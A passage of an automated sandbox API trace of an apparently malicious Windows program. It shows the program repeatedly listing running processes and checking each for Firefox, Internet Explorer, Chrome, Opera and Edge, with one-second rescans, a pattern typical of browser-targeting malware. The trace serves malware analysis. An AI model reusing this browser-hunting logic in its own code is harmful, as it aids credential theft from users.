lpString2="firefox.exe") returned -1 [0224.424] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0224.424] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0224.424] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0224.424] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0224.425] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0224.425] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0224.425] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0224.425] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0224.425] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0224.425] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0224.425] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0224.425] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0224.425] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0224.425] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0224.426] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0224.426] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0224.426] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0224.426] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0224.426] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0224.427] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0224.427] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0224.427] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0224.427] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0224.427] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0224.427] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0224.427] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0224.427] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0224.427] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0224.427] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0224.428] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0224.428] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0224.428] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0224.428] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0224.428] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0224.428] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0224.428] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0224.428] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0224.428] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0224.428] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0224.429] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0224.429] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0224.429] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0224.429] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0224.429] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0224.430] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0224.430] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0224.430] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0224.430] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0224.430] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0224.430] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0224.430] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0224.430] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0224.430] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0224.430] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0224.431] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0224.431] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0224.431] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0224.431] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0224.431] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0224.431] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0224.431] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0224.431] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0224.431] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0224.431] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0224.432] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0224.432] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0224.432] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0224.432] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0224.432] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0224.433] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0224.433] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0224.433] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0224.433] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0224.433] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0224.433] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0224.433] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0224.433] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0224.433] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0224.433] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0224.434] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0224.434] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0224.434] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0224.434] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0224.434] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.434] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0224.434] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0224.434] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0224.434] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0224.435] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0224.435] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0224.435] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0224.435] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0224.435] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0224.435] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0224.435] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0224.436] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0224.436] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0224.436] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0224.436] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0224.436] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.436] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0224.436] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0224.436] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0224.436] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0224.436] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0224.436] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.436] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.437] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0224.437] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0224.437] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0224.437] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0224.437] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.437] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.437] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.437] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.437] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.437] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.437] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.438] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0224.438] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0224.438] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0224.438] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0224.438] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.439] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.439] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.439] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.439] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0224.439] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.439] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0224.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0224.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0224.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0224.439] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.439] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.440] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.440] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.440] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.440] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0224.440] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.440] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0224.440] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0224.440] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0224.441] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0224.441] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.441] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0224.441] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0224.441] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0224.441] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0224.441] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0224.442] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.443] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0224.443] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0224.447] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0224.447] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0224.447] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0224.447] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0224.447] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0224.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0224.448] CloseHandle (hObject=0xe8) returned 1 [0224.448] Sleep (dwMilliseconds=0x3e8) [0225.460] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0225.462] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.462] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0225.462] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0225.462] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0225.462] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0225.462] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0225.462] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.463] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0225.463] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0225.463] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0225.463] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0225.463] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0225.463] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, 